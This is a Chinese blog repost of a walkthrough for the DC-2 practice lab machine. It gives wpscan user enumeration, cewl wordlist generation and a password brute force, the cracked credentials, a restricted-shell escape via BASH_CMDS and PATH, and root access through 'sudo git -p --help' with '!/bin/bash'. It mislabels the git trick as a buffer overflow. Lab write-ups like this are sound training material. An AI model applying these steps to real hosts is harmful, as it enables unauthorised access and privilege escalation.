码迷,mamicode.com
首页 > 其他好文 > 详细

DC-2靶机

时间:2020-05-07 20:07:54      阅读:75      评论:0      收藏:0      [点我收藏+]

标签:root   --   view   block   enumerate   path   缓冲区   地址   收集   

仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-2.zip

一、主机扫描

技术图片

二、信息收集

技术图片

修改hosts文件

windows:C:\Windows\System32\drivers\etc

linux:/etc/hosts

技术图片

wpscan --url http://dc-2 --enumerate u

技术图片
技术图片

提示cewl 爬密码

cewl http://dc-2 > 1.txt

技术图片

破解密码

wpscan --url http://dc-2 -U 2.txt -P 1.txt

技术图片
技术图片
技术图片

登录账户信息收集

Username: jerry, Password: adipiscing

Username: tom, Password: parturient

技术图片
技术图片

尝试ssh登录  tom   parturient   7744

技术图片

查看当前环境

echo $PATH

技术图片

有问题找百度

添加环境变量

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/          #添加$PATH,cat和su都在/bin下

export PATH=$PATH:/usr/bin           #sudo在/usr/bin下

cat flag3.txt

技术图片

Username: jerry, Password: adipiscing

技术图片

切换账户进行信息收集

技术图片

sudo -l 查看权限

技术图片

有git权限,git有一个缓冲区溢出漏洞,在使用sudo git -p --help时,不需要输入root密码即可以root权限执行这条命令

技术图片

在末行命令模式输入 !/bin/bash 或 !‘sh‘ 完成提权

!/bin/bash

技术图片

DC-2靶机

标签:root   --   view   block   enumerate   path   缓冲区   地址   收集   

原文地址:https://www.cnblogs.com/bingtang123/p/12838405.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!